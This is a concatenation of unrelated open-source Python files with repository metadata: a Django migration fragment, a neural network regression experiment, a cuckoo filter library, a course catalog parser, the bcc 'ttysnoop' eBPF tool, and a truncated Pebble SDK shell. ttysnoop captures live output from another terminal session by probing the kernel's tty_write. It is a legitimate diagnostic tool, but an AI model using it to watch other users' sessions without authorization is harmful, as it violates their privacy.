'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'idx': ('django.db.models.fields.IntegerField', [], {}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.Image']"}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.Line']", 'null': 'True'}),
'sidpoint': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.SidPoint']", 'null': 'True'}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {})
},
'clouds.sidpoint': {
'Meta': {'ordering': "['sidtime__time']", 'unique_together': "(('sidtime', 'idx'),)", 'object_name': 'SidPoint'},
'flux': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'idx': ('django.db.models.fields.IntegerField', [], {}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.Line']", 'null': 'True'}),
'prev': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['clouds.SidPoint']", 'unique': 'True', 'null': 'True'}),
'sidtime': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.SidTime']"}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {})
},
'clouds.sidtime': {
'Meta': {'object_name': 'SidTime'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'time': ('django.db.models.fields.TimeField', [], {'unique': 'True'})
}
}
complete_apps = ['clouds']
|
Bjwebb/detecting-clouds
|
clouds/migrations/0013_auto__add_unique_sidpoint_sidtime_idx.py
|
Python
|
mit
| 3,727
|
# Copyright 2017 Max W. Y. Lam
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import sys
sys.path.append("../../../")
import os
import time
import tensorflow as tf
import tensorflow.contrib.layers as layers
from six.moves import range, zip
import numpy as np
import zhusuan as zs
from expt import run_experiment
DATA_PATH = 'CASP.csv'
def load_data(n_folds):
np.random.seed(314159)
import pandas as pd
data = pd.DataFrame.from_csv(path=DATA_PATH, header=0, index_col=None)
data = data.sample(frac=1).dropna(axis=0).as_matrix().astype(np.float32)
X, y = data[:, 1:], data[:, 0]
y = y[:, None]
n_data = y.shape[0]
n_partition = n_data//n_folds
n_train = n_partition*(n_folds-1)
dataset, folds = [], []
for i in range(n_folds):
if(i == n_folds-1):
fold_inds = np.arange(n_data)[i*n_partition:]
else:
fold_inds = np.arange(n_data)[i*n_partition:(i+1)*n_partition]
folds.append([X[fold_inds], y[fold_inds]])
for i in range(n_folds):
valid_fold, test_fold = i, (i+1)%n_folds
train_folds = np.setdiff1d(np.arange(n_folds), [test_fold, valid_fold])
X_train = np.vstack([folds[fold][0] for fold in train_folds])
y_train = np.vstack([folds[fold][1] for fold in train_folds])
X_valid, y_valid = folds[valid_fold]
X_test, y_test = folds[test_fold]
dataset.append([X_train, y_train, X_valid, y_valid, X_test, y_test])
return dataset
if __name__ == '__main__':
if('cpu' in sys.argv):
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
model_names = [
'DNN', 'VIBayesNN', 'MCDropout', 'SSA'
]
dataset = load_data(5)
N, D = dataset[0][0].shape
T, P = dataset[0][-1].shape
print("N = %d, D = %d, T = %d, P = %d"%(N, D, T, P))
# Fair Model Comparison - Same Architecture & Optimization Rule
training_settings = {
'task': "regression",
'save': False,
'plot': True,
'n_basis': 50,
'drop_rate': 0.15,
'train_samples': 20,
'test_samples': 100,
'max_iters': 1000,
'n_hiddens': [100, 50, 25],
'batch_size': 100,
'learn_rate': 1e-3,
'max_epochs': 1500,
'early_stop': 5,
'check_freq': 5,
}
for argv in sys.argv:
if('--' == argv[:2] and '=' in argv):
eq_ind = argv.index('=')
setting_feature = argv[2:eq_ind]
setting_value = argv[eq_ind+1:]
if(setting_feature in ['save', 'plot']):
training_settings[setting_feature] = (setting_value=='True')
if(setting_feature == 'model'):
model_names = [setting_value]
print(training_settings)
eval_rmses, eval_lls = run_experiment(
model_names, 'Protein', dataset, **training_settings)
print(eval_rmses, eval_lls)
for model_name in model_names:
rmse_mu = np.mean(eval_rmses[model_name])
rmse_std = np.std(eval_rmses[model_name])
ll_mu = np.mean(eval_lls[model_name])
ll_std = np.std(eval_lls[model_name])
print('>>> '+model_name)
print('>> RMSE = {:.4f} \pm {:.4f}'.format(rmse_mu, 1.96*rmse_std))
print('>> NLPD = {:.4f} \pm {:.4f}'.format(ll_mu, 1.96*ll_std))
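# Illustrative invocations (flag names inferred from the sys.argv parsing
# above; the model name must match an entry of model_names):
#
#   python training.py --model=VIBayesNN --plot=False
#   python training.py cpu --model=MCDropout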
|
MaxInGaussian/ZS-VAFNN
|
uci-expts/regression/protein/training.py
|
Python
|
apache-2.0
| 3,917
|
""" Cuckoo Filter, python implementation
License: MIT
Author: Tyler Barrus (barrust@gmail.com)
"""
import math
import random
from array import array
from io import BytesIO, IOBase
from mmap import mmap
from numbers import Number
from pathlib import Path
from struct import Struct
from typing import ByteString, List, Tuple, Union
from ..exceptions import CuckooFilterFullError, InitializationError
from ..hashes import KeyT, SimpleHashT, fnv_1a
from ..utilities import MMap, get_x_bits, is_valid_file
class CuckooFilter:
"""Simple Cuckoo Filter implementation
Args:
capacity (int): The number of bins
bucket_size (int): The number of buckets per bin
max_swaps (int): The number of cuckoo swaps before stopping
expansion_rate (int): The rate at which to expand
auto_expand (bool): If the filter should automatically expand
finger_size (int): The size of the fingerprint to use in bytes \
(between 1 and 4); exported as 4 bytes; up to the user to \
reset the size correctly on import
filepath (str): The path to the file to load or None if no file
hash_function (function): Hashing strategy function to use `hf(key)`
Returns:
CuckooFilter: A Cuckoo Filter object"""
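    # Illustrative usage sketch (keys and sizes below are arbitrary examples,
    # not part of the original module):
    #
    #   cko = CuckooFilter(capacity=100, bucket_size=4, max_swaps=100)
    #   cko.add("google.com")
    #   "google.com" in cko       # True, via __contains__/check
    #   cko.remove("google.com")  # True if the fingerprint was found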
__slots__ = [
"_bucket_size",
"_cuckoo_capacity",
"__max_cuckoo_swaps",
"__expansion_rate",
"__auto_expand",
"_fingerprint_size",
"__hash_func",
"_inserted_elements",
"_buckets",
"_error_rate",
]
def __init__(
self,
capacity: int = 10000,
bucket_size: int = 4,
max_swaps: int = 500,
expansion_rate: int = 2,
auto_expand: bool = True,
finger_size: int = 4,
filepath: Union[str, Path, None] = None,
hash_function: Union[SimpleHashT, None] = None,
):
"""setup the data structure"""
valid_prms = (
isinstance(capacity, Number)
and capacity >= 1
and isinstance(bucket_size, Number)
and bucket_size >= 1
and isinstance(max_swaps, Number)
and max_swaps >= 1
)
if not valid_prms:
msg = "CuckooFilter: capacity, bucket_size, and max_swaps must be an integer greater than 0"
raise InitializationError(msg)
self._bucket_size = int(bucket_size)
self._cuckoo_capacity = int(capacity)
self.__max_cuckoo_swaps = int(max_swaps)
self.__expansion_rate = 2
self.expansion_rate = expansion_rate
self.__auto_expand = True
self.auto_expand = auto_expand
self._fingerprint_size = 32
self.fingerprint_size = finger_size
if hash_function is None:
self.__hash_func = fnv_1a
else:
self.__hash_func = hash_function # type: ignore
self._inserted_elements = 0
if filepath is None:
self._buckets = list() # type: ignore
for _ in range(self.capacity):
self.buckets.append(list())
elif is_valid_file(filepath):
self._load(filepath)
else:
msg = "CuckooFilter: failed to load provided file"
raise InitializationError(msg)
self._error_rate = float(self._calc_error_rate())
@classmethod
def init_error_rate(
cls,
error_rate: float,
capacity: int = 10000,
bucket_size: int = 4,
max_swaps: int = 500,
expansion_rate: int = 2,
auto_expand: bool = True,
hash_function: Union[SimpleHashT, None] = None,
):
"""Initialize a simple Cuckoo Filter based on error rate
Args:
error_rate (float):
capacity (int): The number of bins
bucket_size (int): The number of buckets per bin
max_swaps (int): The number of cuckoo swaps before stopping
expansion_rate (int): The rate at which to expand
auto_expand (bool): If the filter should automatically expand
hash_function (function): Hashing strategy function to use \
`hf(key)`
Returns:
CuckooFilter: A Cuckoo Filter object"""
cku = CuckooFilter(
capacity=capacity,
bucket_size=bucket_size,
auto_expand=auto_expand,
max_swaps=max_swaps,
expansion_rate=expansion_rate,
hash_function=hash_function,
)
cku._set_error_rate(error_rate)
return cku
@classmethod
def load_error_rate(
cls, error_rate: float, filepath: Union[str, Path], hash_function: Union[SimpleHashT, None] = None
):
"""Initialize a previously exported Cuckoo Filter based on error rate
Args:
error_rate (float):
filepath (str): The path to the file to load or None if no file
hash_function (function): Hashing strategy function to use `hf(key)`
Returns:
CuckooFilter: A Cuckoo Filter object"""
cku = CuckooFilter(filepath=filepath, hash_function=hash_function)
cku._set_error_rate(error_rate)
return cku
@classmethod
def frombytes(
cls, b: ByteString, error_rate: Union[float, None] = None, hash_function: Union[SimpleHashT, None] = None
) -> "CuckooFilter":
"""
Args:
            b (ByteString): The bytes to load as a Cuckoo Filter
error_rate (float): The error rate of the cuckoo filter, if used to generate the original filter
hash_function (function): Hashing strategy function to use `hf(key, number)`
Returns:
            CuckooFilter: A Cuckoo Filter object
"""
cku = CuckooFilter(hash_function=hash_function)
cku._load(b) # type: ignore
# if error rate is provided, use it
cku._set_error_rate(error_rate)
return cku
def __contains__(self, key: KeyT) -> bool:
"""setup the `in` keyword"""
return self.check(key)
def __str__(self):
"""setup what it will print"""
msg = (
"{0}:\n"
"\tCapacity: {1}\n"
"\tTotal Bins: {2}\n"
"\tLoad Factor: {3}%\n"
"\tInserted Elements: {4}\n"
"\tMax Swaps: {5}\n"
"\tExpansion Rate: {6}\n"
"\tAuto Expand: {7}"
)
return msg.format(
self.__class__.__name__,
self.capacity,
self.capacity * self.bucket_size,
self.load_factor() * 100,
self.elements_added,
self.max_swaps,
self.expansion_rate,
self.auto_expand,
)
@property
def elements_added(self) -> int:
"""int: The number of elements added
Note:
Not settable"""
return self._inserted_elements
@property
def capacity(self) -> int:
"""int: The number of bins
Note:
Not settable"""
return self._cuckoo_capacity
@property
def max_swaps(self) -> int:
"""int: The maximum number of swaps to perform
Note:
Not settable"""
return self.__max_cuckoo_swaps
@property
def bucket_size(self) -> int:
"""int: The number of buckets per bin
Note:
Not settable"""
return self._bucket_size
@property
def buckets(self) -> List[List[int]]:
"""list(list): The buckets holding the fingerprints
Note:
Not settable"""
return self._buckets
@property
def expansion_rate(self) -> int:
"""int: The rate at expansion when the filter grows"""
return self.__expansion_rate
@expansion_rate.setter
def expansion_rate(self, val: int):
"""set the self expand value"""
self.__expansion_rate = val
@property
def error_rate(self) -> float:
"""float: The error rate of the cuckoo filter"""
return self._error_rate
@property
def auto_expand(self) -> bool:
"""bool: True if the cuckoo filter will expand automatically"""
return self.__auto_expand
@auto_expand.setter
def auto_expand(self, val: bool):
"""set the self expand value"""
self.__auto_expand = bool(val)
@property
def fingerprint_size_bits(self) -> int:
"""int: The size in bits of the fingerprint"""
return self._fingerprint_size
@property
def fingerprint_size(self) -> int:
"""int: The size in bytes of the fingerprint
Raises:
ValueError: If the size is not between 1 and 4
Note:
The size of the fingerprint must be between 1 and 4"""
return math.ceil(self.fingerprint_size_bits / 8)
@fingerprint_size.setter
def fingerprint_size(self, val: int):
"""set the fingerprint size"""
tmp = val
if not 1 <= tmp <= 4:
msg = ("{}: fingerprint size must be between 1 and 4").format(self.__class__.__name__)
raise ValueError(msg)
# bytes to bits
self._fingerprint_size = tmp * 8
self._calc_error_rate() # if updating fingerprint size then error rate may change
def load_factor(self) -> float:
"""float: How full the Cuckoo Filter is currently"""
return self.elements_added / (self.capacity * self.bucket_size)
def add(self, key: KeyT):
"""Add element key to the filter
Args:
key (str): The element to add
Raises:
CuckooFilterFullError: When element not inserted after maximum number of swaps or 'kicks'"""
idx_1, idx_2, fingerprint = self._generate_fingerprint_info(key)
is_present = self._check_if_present(idx_1, idx_2, fingerprint)
if is_present is not None: # already there, nothing to do
return
finger = self._insert_fingerprint(fingerprint, idx_1, idx_2)
self._deal_with_insertion(finger)
def check(self, key: KeyT) -> bool:
"""Check if an element is in the filter
Args:
key (str): Element to check
Returns:
            bool: True if likely present, False if definitely not"""
idx_1, idx_2, fingerprint = self._generate_fingerprint_info(key)
is_present = self._check_if_present(idx_1, idx_2, fingerprint)
if is_present is not None:
return True
return False
def remove(self, key: KeyT) -> bool:
"""Remove an element from the filter
Args:
key (str): Element to remove
Returns:
bool: True if removed, False if not present"""
idx_1, idx_2, fingerprint = self._generate_fingerprint_info(key)
idx = self._check_if_present(idx_1, idx_2, fingerprint)
if idx is None:
return False
self.buckets[idx].remove(fingerprint)
self._inserted_elements -= 1
return True
def export(self, file: Union[Path, str, IOBase, mmap]) -> None:
"""Export cuckoo filter to file
Args:
file: Path to file to export"""
if not isinstance(file, (IOBase, mmap)):
with open(file, "wb") as filepointer:
self.export(filepointer) # type:ignore
else:
filepointer = file # type:ignore
for i in range(len(self.buckets)):
bucket = array(self._CUCKOO_SINGLE_INT_C, self.buckets[i])
bucket.extend([0] * (self.bucket_size - len(bucket)))
bucket.tofile(filepointer)
# now put out the required information at the end
filepointer.write(self._CUCKOO_FOOTER_STRUCT.pack(self.bucket_size, self.max_swaps))
def __bytes__(self) -> bytes:
"""Export cuckoo filter to `bytes`"""
with BytesIO() as f:
self.export(f)
return f.getvalue()
def expand(self):
"""Expand the cuckoo filter"""
self._expand_logic(None)
def _insert_fingerprint(self, fingerprint, idx_1, idx_2):
"""insert a fingerprint"""
if self.__insert_element(fingerprint, idx_1):
self._inserted_elements += 1
return None
if self.__insert_element(fingerprint, idx_2):
self._inserted_elements += 1
return None
# we didn't insert, so now we need to randomly select one index to use
# and move things around to the other index, if possible, until we
# either move everything around or hit the maximum number of swaps
idx = random.choice([idx_1, idx_2])
for _ in range(self.max_swaps):
# select one element to be swapped out...
swap_elm = random.randint(0, self.bucket_size - 1)
swb = self.buckets[idx][swap_elm]
fingerprint, self.buckets[idx][swap_elm] = swb, fingerprint
# now find another place to put this fingerprint
index_1, index_2 = self._indicies_from_fingerprint(fingerprint)
idx = index_2 if idx == index_1 else index_1
if self.__insert_element(fingerprint, idx):
self._inserted_elements += 1
return None
# if we got here we have an error... we might need to know what is left
return fingerprint
def _load(self, file: Union[Path, str, IOBase, mmap, bytes]) -> None:
"""load a cuckoo filter from file"""
if not isinstance(file, (IOBase, mmap, bytes)):
file = Path(file)
with MMap(file) as filepointer:
self._load(filepointer)
else:
self._parse_footer(file) # type: ignore
self._inserted_elements = 0
# now pull everything in!
self._parse_buckets(file) # type: ignore
_CUCKOO_SINGLE_INT_C = "I"
_CUCKOO_SINGLE_INT_SIZE = Struct(_CUCKOO_SINGLE_INT_C).size
_CUCKOO_FOOTER_STRUCT = Struct("II")
def _parse_footer(self, d: ByteString) -> None:
"""parse bytes and set footer information"""
list_size = len(d) - self._CUCKOO_FOOTER_STRUCT.size
self._bucket_size, self.__max_cuckoo_swaps = self._CUCKOO_FOOTER_STRUCT.unpack(d[list_size:]) # type:ignore
self._cuckoo_capacity = list_size // self._CUCKOO_SINGLE_INT_SIZE // self.bucket_size
def _parse_buckets(self, d: ByteString) -> None:
"""parse bytes and set buckets"""
self._buckets = list()
bucket_byte_size = self.bucket_size * self._CUCKOO_SINGLE_INT_SIZE
offs = 0
for _ in range(self.capacity):
next_offs = offs + bucket_byte_size
self.buckets.append(self._parse_bucket(d[offs:next_offs])) # type: ignore
offs = next_offs
def _parse_bucket(self, d: ByteString) -> array:
"""parse a single bucket"""
bucket = array(self._CUCKOO_SINGLE_INT_C, bytes(d))
bucket = array(self._CUCKOO_SINGLE_INT_C, [el for el in bucket if el])
self._inserted_elements += len(bucket)
return bucket
def _set_error_rate(self, error_rate: Union[float, None]) -> None:
"""set error rate correctly"""
# if error rate is provided, use it
if error_rate is not None:
self._error_rate = error_rate
self._fingerprint_size = self._calc_fingerprint_size()
def _check_if_present(self, idx_1, idx_2, fingerprint):
"""wrapper for checking if fingerprint is already inserted"""
if fingerprint in self.buckets[idx_1]:
return idx_1
if fingerprint in self.buckets[idx_2]:
return idx_2
return None
def __insert_element(self, fingerprint, idx) -> bool:
"""insert element wrapper"""
if len(self.buckets[idx]) < self.bucket_size:
self.buckets[idx].append(fingerprint)
return True
return False
def _expand_logic(self, extra_fingerprint):
"""the logic to acutally expand the cuckoo filter"""
# get all the fingerprints
fingerprints = self._setup_expand(extra_fingerprint)
for finger in fingerprints:
idx_1, idx_2 = self._indicies_from_fingerprint(finger)
res = self._insert_fingerprint(finger, idx_1, idx_2)
if res is not None: # again, this *shouldn't* happen
msg = "The CuckooFilter failed to expand"
raise CuckooFilterFullError(msg)
def _setup_expand(self, extra_fingerprint):
"""setup this thing"""
fingerprints = list()
if extra_fingerprint is not None:
fingerprints.append(extra_fingerprint)
for idx in range(self.capacity):
fingerprints.extend(self.buckets[idx])
self._cuckoo_capacity = self.capacity * self.expansion_rate
self._buckets = list()
self._inserted_elements = 0
for _ in range(self.capacity):
self.buckets.append(list())
return fingerprints
def _indicies_from_fingerprint(self, fingerprint):
"""Generate the possible insertion indicies from a fingerprint
Args:
fingerprint (int): The fingerprint to use for generating indicies"""
idx_1 = fingerprint % self.capacity
idx_2 = self.__hash_func(str(fingerprint)) % self.capacity
return idx_1, idx_2
def _generate_fingerprint_info(self, key: KeyT) -> Tuple[int, int, int]:
"""Generate the fingerprint and indicies using the provided key
Args:
key (str): The element for which information is to be generated
"""
        # generate the fingerprint along with the two possible indices
hash_val = self.__hash_func(key)
fingerprint = get_x_bits(hash_val, 64, self.fingerprint_size_bits, True)
idx_1, idx_2 = self._indicies_from_fingerprint(fingerprint)
# NOTE: This should never happen...
if idx_1 > self.capacity or idx_2 > self.capacity:
msg = "Either idx_1 {0} or idx_2 {1} is greater than {2}"
raise ValueError(msg.format(idx_1, idx_2, self.capacity))
return idx_1, idx_2, fingerprint
def _deal_with_insertion(self, finger):
"""some code to handle the insertion the same"""
if finger is None:
return
if self.auto_expand:
self._expand_logic(finger)
else:
msg = "The {} is currently full".format(self.__class__.__name__)
raise CuckooFilterFullError(msg)
def _calc_error_rate(self):
"""calculate error rate based on fingerprint size (bits) and bucket size"""
return float(1 / (2 ** (self.fingerprint_size_bits - (math.log2(self.bucket_size) + 1))))
def _calc_fingerprint_size(self) -> int:
"""calculate fingerprint size (bits) based on error rate and bucket size"""
return int(math.ceil(math.log2(1.0 / self.error_rate) + math.log2(self.bucket_size) + 1))
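# ---------------------------------------------------------------------------
# Editor's note: a minimal usage sketch, not part of the original module. It
# assumes the class defined above is exposed as ``CuckooFilter`` (as the
# probables/cuckoo/cuckoo.py path suggests) and that it can be built with its
# default constructor arguments; only methods shown above are exercised.
if __name__ == "__main__":
    cf = CuckooFilter()  # constructor arguments omitted; defaults assumed
    cf.add("example-key")  # insert an element
    assert cf.check("example-key")  # likely present
    assert not cf.check("missing-key")  # definitely not present
    print("load factor:", cf.load_factor())
    cf.remove("example-key")  # delete the element again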
|
barrust/pyprobables
|
probables/cuckoo/cuckoo.py
|
Python
|
mit
| 18,971
|
from BeautifulSoup import BeautifulSoup
import datetime
import urllib2
from rpi_courses.web import get
from features import * # all object postfixed with '_feature' will get used.
import re
RE_DIV = re.compile(r'</?div[^>]*?>', re.I)
def _remove_divs(string):
# Some of the DIV formatting even breaks beautiful soup!
# like this snippet:
# <TD>
# </div>
# </div>
# <div id="m126">
# <a class="a p" id="PAGE126" name="PAGE126"></a>
# <div id="pp126" class="r1">
# <span class="f0" style="top: 79.8pt; left: 0.0pt;">95208 PSYC-4450-01</span>
# </TD>
# when we actually want all TR > TD, the soup misses this... because of the invalid closing DIV tags...
return RE_DIV.sub('', string)
class CourseCatalog(object):
"""Represents the RPI course catalog.
This takes a BeautifulSoup instance
allows an object-oriented method of accessing the data.
"""
# this keeps the parsing separate from the actual data fetching.
# We'll call each feature we imported that ends with '_feature'.
FEATURES = [obj for name, obj in globals().iteritems() if name.endswith('_feature')]
def __init__(self, soup=None, url=None):
"""Instanciates a CourseCatalog given a BeautifulSoup instance.
Pass nothing to initiate an empty course catalog.
"""
self.url = url
if soup is not None:
self.parse(soup)
@staticmethod
def from_string(html_str, url=None):
"Creates a new CourseCatalog instance from an string containing xml."
return CourseCatalog(BeautifulSoup(_remove_divs(html_str),
convertEntities=BeautifulSoup.HTML_ENTITIES
), url)
@staticmethod
def from_stream(stream, url=None):
"Creates a new CourseCatalog instance from a filehandle-like stream."
return CourseCatalog.from_string(stream.read(), url)
@staticmethod
def from_file(filepath):
"Creates a new CourseCatalog instance from a local filepath."
with open(filepath) as f:
return CourseCatalog.from_stream(f, filepath)
@staticmethod
def from_url(url):
"Creates a new CourseCatalog instance from a given url."
catalog = CourseCatalog.from_string(get(url), url)
return catalog
def parse(self, soup):
"Parses the soup instance as RPI's XML course catalog file."
for feature in self.FEATURES:
feature(self, soup)
def crosslisted_with(self, crn):
"""Returns all the CRN courses crosslisted with the given crn.
The returned crosslisting does not include the original CRN.
"""
        raise NotImplementedError
return tuple([c for c in self.crosslistings[crn].crns if c != crn])
def find_courses(self, partial):
"""Finds all courses by a given substring. This is case-insensitive.
"""
partial = partial.lower()
keys = self.courses.keys()
keys = [k for k in keys if k.lower().find(partial) != -1]
courses = [self.courses[k] for k in keys]
return list(set(courses))
def get_courses(self):
"""Returns all course objects from this catalog.
"""
return self.courses.values()
def find_course_by_crn(self, crn):
"""Searches all courses by CRNs. Not particularly efficient.
Returns None if not found.
"""
for name, course in self.courses.iteritems():
if crn in course:
return course
return None
def find_course_and_crosslistings(self, partial):
"""Returns the given course and all other courses it is
crosslisted with.
"""
course = self.find_course(partial)
crosslisted = self.crosslisted_with(course.crn)
return (course,) + tuple(map(self.find_course_by_crn, crosslisted))
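# ---------------------------------------------------------------------------
# Editor's note: a minimal usage sketch, not part of the original module. The
# filename "catalog.html" is hypothetical (any saved copy of the RPI catalog
# page would do); only the factory and search methods defined above are used.
if __name__ == "__main__":
    catalog = CourseCatalog.from_file("catalog.html")
    for course in catalog.find_courses("PSYC"):
        print(course)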
|
jeffh/rpi_courses
|
rpi_courses/sis_parser/course_catalog.py
|
Python
|
mit
| 3,862
|
#!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# ttysnoop Watch live output from a tty or pts device.
# For Linux, uses BCC, eBPF. Embedded C.
#
# Due to a limited buffer size (see BUFSIZE), some commands (eg, a vim
# session) are likely to be printed a little messed up.
#
# Copyright (c) 2016 Brendan Gregg.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# Idea: from ttywatcher.
#
# 15-Oct-2016 Brendan Gregg Created this.
from __future__ import print_function
from bcc import BPF
from subprocess import call
import argparse
from sys import argv
import sys
from os import stat
def usage():
print("USAGE: %s [-Ch] {PTS | /dev/ttydev} # try -h for help" % argv[0])
exit()
# arguments
examples = """examples:
./ttysnoop /dev/pts/2 # snoop output from /dev/pts/2
./ttysnoop 2 # snoop output from /dev/pts/2 (shortcut)
./ttysnoop /dev/console # snoop output from the system console
./ttysnoop /dev/tty0 # snoop output from /dev/tty0
./ttysnoop /dev/pts/2 -s 1024 # snoop output from /dev/pts/2 with data size 1024
./ttysnoop /dev/pts/2 -c 2 # snoop output from /dev/pts/2 with 2 checks for 256 bytes of data in buffer
(potentially retrieving 512 bytes)
"""
parser = argparse.ArgumentParser(
description="Snoop output from a pts or tty device, eg, a shell",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-C", "--noclear", action="store_true",
help="don't clear the screen")
parser.add_argument("device", default="-1",
help="path to a tty device (eg, /dev/tty0) or pts number")
parser.add_argument("-s", "--datasize", default="256",
help="size of the transmitting buffer (default 256)")
parser.add_argument("-c", "--datacount", default="16",
help="number of times we check for 'data-size' data (default 16)")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
debug = 0
if args.device == "-1":
usage()
path = args.device
if path.find('/') != 0:
path = "/dev/pts/" + path
try:
pi = stat(path)
except:
print("Unable to read device %s. Exiting." % path)
exit()
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <linux/fs.h>
#include <linux/uio.h>
#define BUFSIZE USER_DATASIZE
struct data_t {
int count;
char buf[BUFSIZE];
};
BPF_ARRAY(data_map, struct data_t, 1);
BPF_PERF_OUTPUT(events);
static int do_tty_write(void *ctx, const char __user *buf, size_t count)
{
int zero = 0, i;
struct data_t *data;
/* We can't read data to map data before v4.11 */
#if LINUX_VERSION_CODE < KERNEL_VERSION(4, 11, 0)
struct data_t _data = {};
data = &_data;
#else
data = data_map.lookup(&zero);
if (!data)
return 0;
#endif
#pragma unroll
for (i = 0; i < USER_DATACOUNT; i++) {
// bpf_probe_read_user() can only use a fixed size, so truncate to count
// in user space:
if (bpf_probe_read_user(&data->buf, BUFSIZE, (void *)buf))
return 0;
if (count > BUFSIZE)
data->count = BUFSIZE;
else
data->count = count;
events.perf_submit(ctx, data, sizeof(*data));
if (count < BUFSIZE)
return 0;
count -= BUFSIZE;
buf += BUFSIZE;
}
return 0;
};
/**
* commit 9bb48c82aced (v5.11-rc4) tty: implement write_iter
* changed arguments of tty_write function
*/
#if LINUX_VERSION_CODE < KERNEL_VERSION(5, 11, 0)
int kprobe__tty_write(struct pt_regs *ctx, struct file *file,
const char __user *buf, size_t count)
{
if (file->f_inode->i_ino != PTS)
return 0;
return do_tty_write(ctx, buf, count);
}
#else
KFUNC_PROBE(tty_write, struct kiocb *iocb, struct iov_iter *from)
{
const char __user *buf;
const struct kvec *kvec;
size_t count;
if (iocb->ki_filp->f_inode->i_ino != PTS)
return 0;
/**
* commit 8cd54c1c8480 iov_iter: separate direction from flavour
 * `type` is represented by iter_type and data_source separately
*/
#if LINUX_VERSION_CODE < KERNEL_VERSION(5, 14, 0)
if (from->type != (ITER_IOVEC + WRITE))
return 0;
#else
if (from->iter_type != ITER_IOVEC)
return 0;
if (from->data_source != WRITE)
return 0;
#endif
kvec = from->kvec;
buf = kvec->iov_base;
count = kvec->iov_len;
return do_tty_write(ctx, kvec->iov_base, kvec->iov_len);
}
#endif
"""
bpf_text = bpf_text.replace('PTS', str(pi.st_ino))
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
bpf_text = bpf_text.replace('USER_DATASIZE', '%s' % args.datasize)
bpf_text = bpf_text.replace('USER_DATACOUNT', '%s' % args.datacount)
# initialize BPF
b = BPF(text=bpf_text)
if not args.noclear:
call("clear")
# process event
def print_event(cpu, data, size):
event = b["events"].event(data)
print("%s" % event.buf[0:event.count].decode('utf-8', 'replace'), end="")
sys.stdout.flush()
# loop with callback to print_event
b["events"].open_perf_buffer(print_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
brendangregg/bcc
|
tools/ttysnoop.py
|
Python
|
apache-2.0
| 5,269
|
#!/usr/bin/env python
import argparse
import logging
import sys
import pebble.PblAnalytics as PblAnalytics
# Catch any missing python dependencies so we can send an event to analytics
try:
# NOTE: Even though we don't use websocket in this module, keep this
# import here for the unit tests so that they can trigger a missing
# python dependency event.
import websocket
import pebble as libpebble
from pebble.PblProjectCreator import (PblProjectCreator,
InvalidProjectException,
OutdatedProjectException)
from pebble.PblProjectConverter import PblProjectConverter
from pebble.PblBuildCommand import (PblBuildCommand,
PblCleanCommand,
PblAnalyzeSizeCommand)
from pebble.LibPebblesCommand import *
except Exception as e:
logging.basicConfig(format='[%(levelname)-8s] %(message)s',
level = logging.DEBUG)
PblAnalytics.missing_python_dependency_evt(str(e))
raise
class PbSDKShell:
commands = []
def __init__(self):
self.commands.append(PblProjectCreator())
self.commands.append(PblProjectConverter())
self.commands.append(PblBuildCommand())
self.commands.append(PblCleanCommand())
self.commands.append(PblAnalyzeSizeCommand())
self.commands.append(PblInstallCommand())
self.commands.append(PblPingCommand())
self.commands.append(PblListCommand())
self.commands.append(PblRemoveCommand())
self.commands.append(PblCurrentAppCommand())
self.commands.append(PblListUuidCommand())
self.commands.append(PblLogsCommand())
self.commands.append(PblReplCommand())
self.commands.append(PblScreenshotCommand())
def _get_version(self):
try:
from pebble.VersionGenerated import SDK_VERSION
return SDK_VERSION
except:
return "Development"
def main(self):
parser = argparse.ArgumentParser(description = 'Pebble SDK Shell')
parser.add_argument('--debug', action="store_true",
help="Enable debugging output")
parser.add_argument('--version', action='version',
version='PebbleSDK %s' % self._get_version())
subparsers = parser.add_subparsers(dest="command", title="Command",
description="Action to perform")
for command in self.commands:
subparser = subparsers.add_parser(command.name, help = command.help)
command.configure_subparser(subparser)
args = parser.parse_args()
log_level = logging.INFO
if args.debug:
log_level = logging.DEBUG
logging.basicConfig(format='[%(levelname)-8s] %(message)s',
level = log_level)
        # Just in case logging was already set up, basicConfig would not
        # do anything, so set the level on the root logger
logging.getLogger().setLevel(log_level)
return self.run_action(args.command, args)
def run_action(self, action, args):
# Find the extension that was called
command = [x for x in self.commands if x.name == args.command][0]
try:
retval = command.run(args)
if retval:
PblAnalytics.cmd_fail_evt(args.command, 'unknown error')
else:
cmdName = args.command
if cmdName == 'install' and args.logs is True:
cmdName = 'install --logs'
PblAnalytics.cmd_success_evt(cmdName)
return retval
except libpebble.PebbleError as e:
PblAnalytics.cmd_fail_evt(args.command, 'pebble error')
if args.debug:
raise e
else:
logging.error(e)
return 1
except ConfigurationException as e:
PblAnalytics.cmd_fail_evt(args.command, 'configuration error')
logging.error(e)
return 1
except InvalidProjectException as e:
PblAnalytics.cmd_fail_evt(args.command, 'invalid project')
logging.error("This command must be run from a Pebble project "
"directory")
return 1
